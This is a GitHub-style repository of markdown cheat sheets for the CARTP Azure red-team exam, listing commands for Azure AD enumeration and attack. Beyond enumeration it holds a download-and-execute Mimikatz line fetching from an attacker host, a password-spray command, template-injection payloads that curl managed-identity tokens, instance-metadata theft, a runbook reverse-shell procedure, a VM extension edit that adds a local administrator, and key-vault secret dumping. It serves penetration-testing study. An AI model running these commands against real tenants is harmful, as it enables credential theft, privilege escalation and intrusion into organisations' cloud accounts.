├── AADInternals.md
├── Az PowerShell.md
├── Azure CLI.md
├── AzureAD Preview.md
├── AzureAD.md
├── Microburst.md
├── Other tools.md
└── README.md


/AADInternals.md:
--------------------------------------------------------------------------------
 1 | ### Install the AADInternal Powershell Module
 2 | >Install-Module AADInternals
 3 | 
 4 | > Import-Module AADInternals -Verbose
 5 | 
 6 | ### Get tenant name, brand name
 7 | > Get-AADIntLoginInformation -UserName \<username>@\<domain name>.onmicrosoft.com 
 8 | 
 9 | ### Get tenant ID
10 | > Get-AADIntTenantID -Domain \<domain name>.onmicrosoft.com 
11 | 
12 | ### Get tenant domains
13 | > Get-AADIntTenantDomains -Domain \<domain name>.onmicrosoft.com 
14 | 
15 | ### Get more information
16 | > Invoke-AADIntReconAsOutsider -DomainName \<domain name>.onmicrosoft.com
17 | 
18 | ### Discover if tenant is using AzureAD and enumerate users
19 | >https://login.microsoftonline.com/getuserrealm.srf?login=\<username>@\<domain name>.onmicrosoft.com&xml=1


--------------------------------------------------------------------------------
/Az PowerShell.md:
--------------------------------------------------------------------------------
  1 | ### Connect
  2 | > $passwd = ConvertTo-SecureString "\<password>" -AsPlainText -Force
  3 | 
  4 | > $creds = New-Object System.Management.Automation.PSCredential
  5 | ("\<username>@\<domain name>.onmicrosoft.com"
  6 | , $passwd) 
  7 | 
  8 | > Connect-AzAccount -Credential $creds
  9 | 
 10 | ### Get all App services
 11 | >Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
 12 | 
 13 | Get function apps 
 14 | >Get-AzFunctionApp
 15 | 
 16 | Get all storage accounts
 17 | >Get-AzStorageAccount | fl
 18 | 
 19 | AAD users
 20 | > Get-AzADUser
 21 | 
 22 | ### Others
 23 | > Get-AzResource
 24 | 
 25 | To get commands for VMs (replace for other resources)
 26 | > Get-Command -Noun *vm* -Verb Get
 27 | 
 28 | Get info about current context
 29 | >Get-AzContext
 30 | 
 31 | List all available contexts
 32 | >Get-AzContext -ListAvailable
 33 | 
 34 | Enumerate subscriptions accessible by the current user
 35 | >Get-AzSubscription
 36 | 
 37 | Enumerate all resources visible to the current user
 38 | >Get-AzResource
 39 | 
 40 | Enumerate all Azure RBAC role assignments
 41 | >Get-AzRoleAssignment
 42 | 
 43 | Enumerate a specific user
 44 | >Get-AzADUser -UserPrincipalName \<username>@\<domain name>.onmicrosoft.com 
 45 | 
 46 | Search for a user based on string in first characters of DisplayName
 47 | > Get-AzADUser -SearchString "admin" 
 48 | 
 49 | Search for users who contain the word "admin" in their Display name:
 50 | > Get-AzADUser |?{$_.Displayname -match "admin"} 
 51 | 
 52 | ### AAD Groups
 53 | List all groups
 54 | >Get-AzADGroup
 55 | 
 56 | Get-AzADGroup
 57 | > Get-AzADGroup -ObjectId \<objectID> 
 58 | 
 59 | Search for a group based on string in first characters of DisplayName
 60 | > Get-AzADGroup -SearchString "admin" | fl * 
 61 | 
 62 | To search for groups which contain the word "admin" in their name:
 63 | > Get-AzADGroup |?{$_.Displayname -match "admin"} 
 64 | 
 65 | Get members of a group
 66 | > Get-AzADGroupMember -ObjectId \<objectID>
 67 | 
 68 | ### AAD Apps 
 69 | Get all the application objects registered with the current tenant
 70 | > Get-AzADApplication
 71 | 
 72 | Get all details about an application
 73 | > Get-AzADApplication -ObjectId \<objectID>
 74 | 
 75 | Get an application based on the display name
 76 | > Get-AzADApplication | ?{$_.DisplayName -match "app"} 
 77 | 
 78 | Get apps that have passwords set (can't get password)
 79 | > Get-AzADApplication | %{if(Get-AzADAppCredential -ObjectID
 80 | \$\_.ObjectID){$_}}
 81 | 
 82 | ### AAD Service Principals
 83 | Get all service principals
 84 | > Get-AzADServicePrincipal
 85 | 
 86 | Get all details about a service principal
 87 | > Get-AzADServicePrincipal -ObjectId \<objectID>
 88 | 
 89 | Get a service principal based on the display name
 90 | > Get-AzADServicePrincipal | ?{$_.DisplayName -match "app"}
 91 | 
 92 | ### Key vaults
 93 | List all key vaults
 94 | >Get-AzKeyVault
 95 | 
 96 | Get info about a specific vault
 97 | >Get-AzKeyVault -VaultName \<vault name>
 98 | 
 99 | List saved creds
100 | > Get-AzKeyVaultSecret -VaultName \<vault name> -AsPlainText
101 | 
102 | Read saved creds
103 | > Get-AzKeyVaultSecret -VaultName \<vault name> -Name <secret name> -AsPlainText
104 | 
105 | ### Access token
106 | Request access token for ARM
107 | > Get-AzAccessToken
108 | 
109 | >(Get-AzAccessToken).Token
110 | 
111 | Request access token for AAD Graph
112 | > Get-AzAccessToken -ResourceTypeName MSGraph
113 | 
114 | >(Get-AzAccessToken -ResourceTypeName MSGraph).Token
115 | 
116 | For older versions of Az PS
117 | > (Get-AzAccessToken -Resource "https://graph.microsoft.com").Token 
118 | 
119 | Connect using the token
120 | ARM token
121 | > Connect-AzAccount -AccountId \<username>@\<domain name>.onmicrosoft.com -AccessToken $token
122 | 
123 | MS Graph token
124 | > Connect-AzAccount -AccountId \<username>@\<domain name>.onmicrosoft.com -AccessToken $token -MicrosoftGraphAccessToken $graphtoken
125 | 
126 | ### Read resource group deployment history
127 | >Get-AzResourceGroup
128 | 
129 | >Get-AzResourceGroupDeployment -ResourceGroupName \<resource group name>
130 | 
131 | Save the deployment locally
132 | >Save-AzResourceGroupDeploymentTemplate -ResourceGroupName \<resource group name> -DeploymentName \<deployment name>
133 | 
134 | ### Other notes
135 | Az PowerShell stores access tokens in clear text in C:\Users\[username]\.Azure\TokenCache.dat
136 | 
137 | It also stores ServicePrincipalSecret in clear-text in AzureRmContext.json if a service principal was used to authenticate


--------------------------------------------------------------------------------
/Azure CLI.md:
--------------------------------------------------------------------------------
  1 | ### Download MSI here: https://docs.microsoft.com/en-us/cli/azure/install-azure-cli
  2 | 
  3 | ### Connect
  4 | > az login
  5 | 
  6 | > az login -u \<username>@\<domain name>.onmicrosoft.com -p \<password>
  7 | 
  8 | ### If the user has no permissions on the subscription
  9 | > az login -u \<username>@\<domain name>.onmicrosoft.com -p \<password> --allow-no-subscriptions
 10 | 
 11 | ### List all users in Azure AD
 12 | > az ad user list --output table 
 13 | 
 14 | > az ad user list --query "[].[displayName]" -o table 
 15 | 
 16 | See only principal name and display name
 17 | > az ad user list --query "[].[userPrincipalName,displayName]" --output table
 18 | 
 19 | Get details about the current tenant:
 20 | > az account tenant list
 21 | 
 22 | Get details about the current subscription:
 23 | > az account subscription list
 24 | 
 25 | List the current signed-in user
 26 | > az ad signed-in-user show
 27 | 
 28 | Show details of a spcific user
 29 | > az ad user show --id \<username>@\<domain name>.onmicrosoft.com
 30 | 
 31 | All users synced from on-prem
 32 | >az ad user list --query "[?onPremisesSecurityIdentifier!=null].displayName"
 33 | 
 34 | All users from Azure AD
 35 | >az ad user list --query "[?onPremisesSecurityIdentifier==null].displayName"
 36 | 
 37 | Search for users with "admin" in name (cmd)
 38 | > az ad user list --query "[?contains(displayName,'admin')].displayName"
 39 | 
 40 | Search for users with "admin" in name (ps)
 41 | > az ad user list | ConvertFrom-Json | %{$_.displayName -match "admin"} 
 42 | 
 43 | ### Groups
 44 | List all groups
 45 | >az ad group list
 46 | 
 47 | >az ad group list --query "[].[displayName]" -o table
 48 | 
 49 | Enumerate a specific group using display names or object id
 50 | > az ad group show -g "\<group name>"
 51 | 
 52 | > az ad group show -g \<objectID>
 53 | 
 54 | Search for groups with "admin" in name (case sensitive) (cmd)
 55 | > az ad group list --query "[?contains(displayName,'admin')].displayName"
 56 | 
 57 | Search for groups with "admin" in name (case sensitive) (ps)
 58 | > az ad group list --query "[?contains(displayName,'admin')].displayName"
 59 | 
 60 | All groups that are synced from on-prem
 61 | > az ad group list --query "[?onPremisesSecurityIdentifier!=null].displayName"
 62 | 
 63 | All groups that are from Azure AD
 64 | > az ad group list --query "[?onPremisesSecurityIdentifier==null].displayName"
 65 | 
 66 | Get members of group
 67 | > az ad group member list -g "VM Admins" --query "[].[displayName]" -o table
 68 | 
 69 | Check if a usr is a member of a specific group
 70 | > az ad group member check --group "\<group name>" --member-id \<objectID>
 71 | 
 72 | Get the IDs of the groups a specific member is a part of
 73 | > az ad group get-member-groups -g "\<group name>" 
 74 | 
 75 | ### AAD Apps
 76 | Get all the application objects registered with the current tenant
 77 | > az ad app list
 78 | 
 79 | >az ad app list --query "[].[displayName]" -o table
 80 | 
 81 | Get all details about app using identifier ID, app ID, obj ID
 82 | > az ad app show --id \<objectID>
 83 | 
 84 | Get an app based on display name
 85 | cmd:
 86 | > az ad app list --query "[?contains(displayName,'app')].displayName"
 87 | 
 88 | powershell:
 89 | >az ad app list | ConvertFrom-Json | %{$_.displayName -match "app"} 
 90 | 
 91 | Get owner of an app
 92 | > az ad app owner list --id \<objectID> --query "[].[displayName]" -o table
 93 | 
 94 | List apps that have password credentials
 95 | > az ad app list --query "[?passwordCredentials != null].displayName"
 96 | 
 97 | ### AAD Service Principals
 98 | Get all service principals
 99 | > az ad sp list --all
100 | 
101 | >az ad sp list --all --query "[].[displayName]" -o table
102 | 
103 | Get all details about a service principal using service principal id or object id
104 | > az ad sp show --id \<objectID>
105 | 
106 | Get a service principal based on the display name (cmd)
107 | > az ad sp list --all --query "[?contains(displayName,'app')].displayName"
108 | 
109 | Get a service principal based on the display name (cmd)
110 | >az ad sp list --all | ConvertFrom-Json | %{$_.displayName -match "app"}
111 | 
112 | Get owner of a service principal
113 | > az ad sp owner list --id \<objectID> --query "[].[displayName]" -o table
114 | 
115 | Get service principals owned by the current user
116 | > az ad sp list --show-mine
117 | 
118 | List apps that have password credentials
119 | > az ad sp list --all --query "[?passwordCredentials != null].displayName"
120 | 
121 | List apps that have key credentials (use of certificate authentication)
122 | > az ad sp list --all --query "[?keyCredentials != null].displayName"
123 | 
124 | List the names of the app services
125 | > az webapp list --query "[].[name]" -o table
126 | 
127 | List the app services but with details
128 | > az webapp list
129 | 
130 | List the names of the Function Apps
131 | > az functionapp list --query "[].[name]" -o table
132 | 
133 | List the storage account
134 | > az storage account list
135 | 
136 | List readable keyvaults
137 | > az keyvault list
138 | 
139 | ### Access tokens
140 | 
141 | Request an ARM access token
142 | > az account get-access-token
143 | 
144 | Request an AAD graph access token
145 | > az account get-access-token --resource-type ms-graph 
146 | 
147 | Steal tokens: az cli stores access tokens in clear text in C:\Users\\[username]\.Azure\accessTokens.json
148 | 
149 | Moreover, info about subscription can be found in azureProfile.json
150 | 
151 | To clear access tokens:
152 | > az logout
153 | 
154 | ### Privilege Escalation
155 | If you have a reverse shell, check if the user is logged-in to az cli on the machine
156 | > whoami
157 | 
158 | >az ad signed-in-user show
159 | 
160 | Get info on automation accounts (might not return anything)
161 | >az extension add --upgrade -n automation
162 | 
163 | >az automation account list
164 | 
165 | Check for objects owned by the user
166 | >az ad signed-in-user list-owned-objects
167 | 
168 | Request a token for AAD Graph to be able to interact with Azure AD
169 | >az account get-access-token --resource-type aad-graph
170 | 
171 | See info about a user
172 | >az ad user show --id \<username>@\<domain name>.onmicrosoft.com


--------------------------------------------------------------------------------
/AzureAD Preview.md:
--------------------------------------------------------------------------------
 1 | ### Install the AzureADPreview module
 2 | >Install-Module -Name AzureADPreview
 3 | 
 4 | >Import-Module AzureADPreview
 5 | 
 6 | ### Connect
 7 | >$passwd = ConvertTo-SecureString
 8 | "\<password>" -AsPlainText -Force
 9 | 
10 | >$creds = New-Object System.Management.Automation.PSCredential
11 | ("\<username>@\<domain name>.onmicrosoft.com"
12 | , $passwd)
13 | 
14 | >Connect-AzureAD -Credential $creds
15 | 
16 | List custom roles
17 | > Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName
18 | 
19 | ### List dynamic membership rules 
20 | List dynamic membership rules using AzureADPreview (if AzureAD doesn't work)
21 | >Remove-Module AzureAD
22 | 
23 | > Import-Module AzureADPreview\AzureADPreview.psd1
24 | 
25 | >Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}
26 | 
27 | >Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'} | select MembershipRule


--------------------------------------------------------------------------------
/AzureAD.md:
--------------------------------------------------------------------------------
  1 | ### Install the AzureADPreview module
  2 | 
  3 | >Install-Module AzureAD
  4 | 
  5 | >Import-Module AzureAD
  6 | 
  7 | ### Connect 
  8 | 
  9 | > $passwd = ConvertTo-SecureString
 10 | "\<password>" -AsPlainText -Force
 11 | 
 12 | >$creds = New-Object System.Management.Automation.PSCredential
 13 | ("\<username>@\<domain name>.onmicrosoft.com"
 14 | , $passwd)
 15 | 
 16 | >Connect-AzureAD -Credential $creds
 17 | 
 18 | Get the current session state (like whoami)
 19 | > Get-AzureADCurrentSessionInfo
 20 | 
 21 | Get details of the current tenant
 22 | > Get-AzureADTenantDetail
 23 | 
 24 | ## Users
 25 | 
 26 | Enumerate all users
 27 | > Get-AzureADUser -All $true 
 28 | 
 29 | To obtain only the email addresses:
 30 | >$users = Get-AzureADUser -All $true
 31 | 
 32 | >foreach ($user in $users) {
 33 |     $email = $user.UserPrincipalName
 34 |     Write-Output $email | Tee-Object -FilePath "emails.txt" -Append
 35 | }
 36 | 
 37 | Enumerate a specific user
 38 | > Get-AzureADUser -ObjectId \<username>@\<domain name>.onmicrosoft.com
 39 | 
 40 | Search for a user that has "admin" in the display name of user principal name 
 41 | > Get-AzureADUser -SearchString "admin"
 42 | 
 43 | > Get-AzureADUser -All \$true |?{$_.Displayname -match "admin"} 
 44 | 
 45 | List all the attributes of a user
 46 | > Get-AzureADUser -ObjectId \<username>@\<domain name>.onmicrosoft.com | fl *
 47 | 
 48 | > Get-AzureADUser -ObjectId \<username>@\<domain name>.onmicrosoft.com | %{$_.PSObject.Properties.Name} 
 49 | 
 50 | Search for attributes of users that contain the string "password"
 51 | > Get-AzureADUser -All \$true |%{\$Properties =
 52 | $_;$Properties.PSObject.Properties.Name | % {if
 53 | (\$Properties.\$_ -match 'password')
 54 | {"$($Properties.UserPrincipalName) - $_ -
 55 | \$($Properties.$_)"}}}
 56 | 
 57 | All users who are synced from on-prem
 58 | > Get-AzureADUser -All \$true |
 59 | ?{$_.OnPremisesSecurityIdentifier -ne $null}
 60 | 
 61 | All users who are from Azure AD
 62 | > Get-AzureADUser -All \$true |
 63 | ?{$_.OnPremisesSecurityIdentifier -eq $null}
 64 | 
 65 | Objects created by any user
 66 | > Get-AzureADUser | Get-AzureADUserCreatedObject
 67 | 
 68 | Objects created by a specific user
 69 | > Get-AzureADUserOwnedObject -ObjectId
 70 | \<username>@\<domain name>.onmicrosoft.com
 71 | 
 72 | ## Groups
 73 | 
 74 | List all groups
 75 | > Get-AzureADGroup -All $true 
 76 | 
 77 | Enumerate a specific group
 78 | > Get-AzureADGroup -ObjectId \<objectID>
 79 | 
 80 | Search for a group based on string in first characters of DisplayName 
 81 | > Get-AzureADGroup -SearchString "admin" | fl *
 82 | 
 83 | Search for groups which contain the word "admin" in their name
 84 | > Get-AzureADGroup -All \$true |?{$_.Displayname -match "admin"} 
 85 | 
 86 | Get Groups that allow Dynamic membership
 87 | > Get-AzureADMSGroup | ?{$_.GroupTypes -eq
 88 | 'DynamicMembership'}
 89 | 
 90 | Get those dynamic rules
 91 | >Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'} | select MembershipRule
 92 | 
 93 | All groups synced from on-prem
 94 | > Get-AzureADGroup -All \$true |
 95 | ?{$_.OnPremisesSecurityIdentifier -ne $null} 
 96 | 
 97 | All groups from Azure AD
 98 | > Get-AzureADGroup -All \$true |
 99 | ?{$_.OnPremisesSecurityIdentifier -eq $null}
100 | 
101 | Get members of a group
102 | > Get-AzureADGroupMember -ObjectId \<objectID>
103 | 
104 | Get groups and roles where the specified user is a member
105 | > Get-AzureADUser -SearchString '\<username>' | GetAzureADUserMembership
106 | 
107 | > Get-AzureADUserMembership -ObjectId
108 | \<username>@\<domain name>.onmicrosoft.com
109 | 
110 | Get all available roles templates
111 | > Get-AzureADDirectoryroleTemplate
112 | 
113 | Get all enabled roles 
114 | > Get-AzureADDirectoryRole
115 | 
116 | Enumerate users to whom GA role is assigned
117 | > Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global
118 | Administrator'" | Get-AzureADDirectoryRoleMember
119 | 
120 | ## Devices
121 | 
122 | Get all Azure joined and registered devices
123 | > Get-AzureADDevice -All $true | fl *
124 | 
125 | Get the device configuration object
126 | > Get-AzureADDeviceConfiguration | fl *
127 | 
128 | List all the active devices
129 | > Get-AzureADDevice -All \$true |
130 | ?{$_.ApproximateLastLogonTimeStamp -ne $null}
131 | 
132 | List Registered owners of all the devices
133 | > Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredOwner
134 | 
135 | > Get-AzureADDevice -All $true | %{if($user=Get-AzureADDeviceRegisteredOwner -ObjectId
136 | \$\_.ObjectID){\$_;$user.UserPrincipalName;"`n"}} 
137 | 
138 | List devices owned by a user
139 | > Get-AzureADUserOwnedDevice -ObjectId \<username>@\<domain name>.onmicrosoft.com
140 | 
141 | List devices registered by a user
142 | > Get-AzureADUserRegisteredDevice -ObjectId \<username>@\<domain name>.onmicrosoft.com
143 | 
144 | List devices managed using Intune
145 | > Get-AzureADDevice -All \$true | ?{$_.IsCompliant -eq "True"}
146 | 
147 | ## Aplications
148 | 
149 | Get all the application objects registered with the current tenant 
150 | > Get-AzureADApplication -All $true
151 | 
152 | Get all details about an app
153 | > Get-AzureADApplication -ObjectId \<objectID> | fl *
154 | 
155 | Get an app based on the display name
156 | > Get-AzureADApplication -All \$true | ?{$_.DisplayName -match "app"} 
157 | 
158 | Show apps with a password (cannot see the password)
159 | > Get-AzureADApplication -All \$true | %{if(Get-AzureADApplicationPasswordCredential -ObjectID \$\_.ObjectID){$_}}
160 | 
161 | Get owner of an application 
162 | > Get-AzureADApplication -ObjectId \<objectID> | Get-AzureADApplicationOwner |fl * 
163 | 
164 | Get Apps where a User has a role (exact role is not shown)
165 | > Get-AzureADUser -ObjectId
166 | \<username>@\<domain name>.onmicrosoft.com | Get-AzureADUserAppRoleAssignment | fl *
167 | 
168 | Get Apps where a Group has a role (exact role is not shown)
169 | > Get-AzureADGroup -ObjectId \<objectID> | Get-AzureADGroupAppRoleAssignment | fl *
170 | 
171 | ## Service principals
172 | 
173 | Get all service principals (Enterprise Apps in Portal)
174 | > Get-AzureADServicePrincipal -All $true
175 | 
176 | Get all details about a service principal
177 | > Get-AzureADServicePrincipal -ObjectId \<objectID> | fl *
178 | 
179 | Get a service principal based on the display name
180 | > Get-AzureADServicePrincipal -All \$true | ?{$_.DisplayName -match "app"} 
181 | 
182 | List all the service principals with an application password
183 | > Get-AzureADServicePrincipal -All $true | %{if(Get-AzureADServicePrincipalKeyCredential -ObjectID \$\_.ObjectID){\$_}}
184 | 
185 | Get owner of a service principal
186 | > Get-AzureADServicePrincipal -ObjectId \<objectID> | Get-AzureADServicePrincipalOwner |fl * 
187 | 
188 | Get objects owned by a service principal
189 | > Get-AzureADServicePrincipal -ObjectId \<objectID> | Get-AzureADServicePrincipalOwnedObject
190 | 
191 | Get objects created by a service principal
192 | > Get-AzureADServicePrincipal -ObjectId \<objectID> | Get-AzureADServicePrincipalCreatedObject
193 | 
194 | Get group and role memberships of a service principal
195 | > Get-AzureADServicePrincipal -ObjectId \<objectID> | Get-AzureADServicePrincipalMembership |fl *
196 | 
197 | ## Application proxies
198 | Get all apps that have application proxies configured
199 | >Get-AzureADApplication | %{try{Get-AzureADApplicationProxyApplication -ObjectId \$\_.ObjectID;\$\_.DisplayName;$_.ObjectID}catch{}}
200 | 
201 | Get the service principal (enterprise app) - they have the same name
202 | >Get-AzureADServicePrincipal -All \$true | ?{$_.DisplayName -eq "\<name>"}
203 | 
204 | ### Access tokens
205 | Connect tusing tokens for AAD Graph
206 | > Connect-AzureAD -AccountId
207 | \<username>@\<domain name>.onmicrosoft.com -AadAccessToken $token
208 | 
209 | ### Add a user to a group
210 | Add-AzureADGroupMember -ObjectId \<group objectID> -RefObjectId \<user objectID> -Verbose
211 | 
212 | ### Exploit Automation Accounts
213 | 
214 | See if a hybrid worker group is in use by the automation account. This will allow us to execute commands on-prem
215 | > Get-AzAutomationHybridWorkerGroup -AutomationAccountName \<automation account name> -ResourceGroupName \<resource group name>
216 | 
217 | Run command to get reverse shell through the worker. 
218 | >Import-AzAutomationRunbook -Name \<runbook name> -Path
219 | \<path> -AutomationAccountName \<automation account name> -ResourceGroupName \<resource group name> -Type PowerShell -Force -Verbose
220 | 
221 | Publish the runbook
222 | >Publish-AzAutomationRunbook -RunbookName \<runbook name> -AutomationAccountName \<automation account name> -ResourceGroupName \<resource group name> -Verbose
223 | 
224 | Start the runbook (with a listener on)
225 | >Start-AzAutomationRunbook -RunbookName \<runbook name> -RunOn \<worker group name> -AutomationAccountName \<automation account name> -ResourceGroupName \<resource group name> -Verbose
226 | 
227 | ### Run command on VM (if you have the runCommand action) (add your own user to the VM - you can run commands with system privileges)
228 | > Invoke-AzVMRunCommand -VMName \<VM name> -ResourceGroupName \<resource group name> -CommandId 'RunPowerShellScript' -ScriptPath \<script paht> -Verbose
229 | 
230 | ### Connect to a VM knowing the  IP and credentials
231 | To get the IP:
232 | > Get-AzPublicIpAddress -Name \<VM name>
233 | 
234 | > $password = ConvertTo-SecureString '\<password>' -AsPlainText -Force
235 | 
236 | >$creds = New-Object
237 | System.Management.Automation.PSCredential('\<username>', $Password)
238 | 
239 | > $session = New-PSSession -ComputerName \<IP> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
240 | 
241 | >Enter-PSSession $session
242 | 
243 | ### Get a secret from a key vault
244 | 
245 | >Get-AzKeyVault
246 | 
247 | >Get-AzKeyVaultSecret -VaultName \<vault name>
248 | 
249 | >Get-AzKeyVaultSecret -VaultName \<vault name> -Name \<secret name> –AsPlainText
250 | 
251 | ### Get information about a control unit
252 | >Get-AzureADMSAdministrativeUnit -Id \<objectID>
253 | 
254 | >Get-AzureADMSAdministrativeUnitMember -Id \<objectID>
255 | 
256 | Check for roles scoped to the administrative unit
257 | >Get-AzureADMSScopedRoleMembership -Id \<objectID> | fl *
258 | 
259 | ### Edit an existing VM custom extension
260 | See if the found extension is already installed
261 | >Get-AzVMExtension -ResourceGroupName \<resource group name> -VMName "\<VM name>"
262 | 
263 | Modify the "commandToExecute" to add a new local admin
264 | ```
265 | Set-AzVMExtension -ResourceGroupName "<resource group name>" -ExtensionName "<extension name>" -VMName "<VM name>" -Location "<location>" -Publisher Microsoft.Compute -ExtensionType CustomScriptExtension -TypeHandlerVersion 1.8 -SettingString '{"commandToExecute":"powershell net users <username> <password> /add /Y; net localgroup administrators <username> /add"}'
266 | ```
267 | 
268 | ### Enumerate a storage container
269 | >Get-AzStorageContainer -Context (Get-AzStorageAccount -Name \<storage account name> -ResourceGroupName \<resource group name>).Context
270 | 


--------------------------------------------------------------------------------
/Microburst.md:
--------------------------------------------------------------------------------
 1 | ### Install Microburst
 2 | >wget https://github.com/NetSPI/MicroBurst/archive/refs/heads/master.zip -OutFile MicroBurst.zip
 3 | 
 4 | >Expand-Archive MicroBurst.zip -DestinationPath .
 5 | 
 6 | >Rename-Item MicroBurst-master MicroBurst
 7 | 
 8 | ### Enumerate all of the organization's subdomains
 9 | > Import-Module MicroBurst.psm1 -Verbose
10 | 
11 | > Invoke-EnumerateAzureSubDomains -Base \<domain name> -Verbose 
12 | 
13 | ### Enumerate publicly accessible blobs
14 | Find blobs with anonymous access by adding to keywords to Microburst\Misc\permutations.txt (example: common, backup, code, admin, secrets).
15 | 
16 | Find blobs:
17 | > . MicroBurst\Misc\Invoke-EnumerateAzureBlobs.ps1
18 | 
19 | >Invoke-EnumerateAzureBlobs -Base \<domain name>
20 | 
21 | 


--------------------------------------------------------------------------------
/Other tools.md:
--------------------------------------------------------------------------------
 1 | ### Discover valid emails using o365creeper
 2 | Add a list of possible emails in the emails.txt file
 3 | > python o365creeper.py -f emails.txt -o validemails.txt 
 4 | 
 5 | ### Password spray
 6 | > MSOLSpray\MSOLSPray.ps1
 7 | Invoke-MSOLSpray -UserList emails.txt
 8 | -Password \<password> -Verbose 
 9 | 
10 | ### Using Bloodhound
11 | Connect with both AzureAD module and AZ PS
12 | >Connect-AzAccount -Credential $creds
13 | 
14 | >Connect-AzureAD -Credential $creds
15 | 
16 | Use BloodHound
17 | > . AzureHound.ps1
18 | 
19 | > Invoke-AzureHound -Verbose
20 | 
21 | Log in in BloodHound (username: neo4j, password: BloodHound)
22 | 
23 | To resolve ObjectIds to names
24 | > MATCH (n) WHERE n.azname IS NOT NULL AND n.azname <> "" AND n.name IS NULL SET n.name =
25 | n.azname
26 | 
27 | Find all users who have the Global Administrator role
28 | > MATCH p =(n)-[r:AZGlobalAdmin*1..]->(m) RETURN p
29 | 
30 | Find all paths to an Azure VM
31 | >MATCH p = (n)-[r]->(g: AZVM) RETURN p
32 | 
33 | Find all paths to an Azure KeyVault
34 | >MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p
35 | 
36 | Find all paths to an Azure Resource Group
37 | >MATCH p = (n)-[r]->(g:AZResourceGroup) RETURN p
38 | 
39 | Find Owners of Azure Groups
40 | >MATCH p = (n)-[r:AZOwns]->(g:AZGroup) RETURN p
41 | 
42 | ### Get creds w/ Mimikatz
43 | Download and execute Mimikatz
44 | >iex (New-Object Net.Webclient).DownloadString("http://\<IP>:\<port>/Invoke-Mimikatz.ps1")
45 | 
46 | >Invoke-Mimikatz -Command '"token::elevate" "lsadump::secrets"'
47 | 
48 | ### Extract user data
49 | >$userData = Invoke-RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "http://\<IP>/metadata/instance/compute/userData?api-version=2021-01-01&format=text"
50 | 
51 | >[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($userData))
52 | 
53 | ### Look in PowerShell context history
54 | > Get-PSReadLineOption
55 | 
56 | ### Request a key vault access token
57 | ```
58 | {{config.__class__.__init__.__globals__['os'].popen('curl
59 | "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read()}}
60 | ```
61 | ### Request an ARM access token.
62 | ```
63 | {{config.__class__.__init__.__globals__['os'].popen('curl
64 | "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read()}}
65 | ```
66 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | This is my cheatsheet for the CARTP (Certified Azure Red Team Professional) exam, which I passed on the 28th of April 2023. 
 2 | 
 3 | Contents
 4 | * [AzureAD](https://github.com/sabrinalupsan/pentesting-azure-ad/blob/main/AzureAD.md)
 5 | * [Azure CLI](https://github.com/sabrinalupsan/pentesting-azure-ad/blob/main/Azure%20CLI.md)
 6 | * [Az PowerShell](https://github.com/sabrinalupsan/pentesting-azure-ad/blob/main/Az%20PowerShell.md)
 7 | * [AzureAD Preview](https://github.com/sabrinalupsan/pentesting-azure-ad/blob/main/AzureAD%20Preview.md)
 8 | * [AADInternals](https://github.com/sabrinalupsan/pentesting-azure-ad/blob/main/AADInternals.md)
 9 | * [Microburst](https://github.com/sabrinalupsan/pentesting-azure-ad/blob/main/Microburst.md)
10 | * [Other tools](https://github.com/sabrinalupsan/pentesting-azure-ad/blob/main/Other%20tools.md)
11 | 
12 | These notes are based on Nikhil Mittal's CARTP coursework over at Altered Security, which I highly recommend.


--------------------------------------------------------------------------------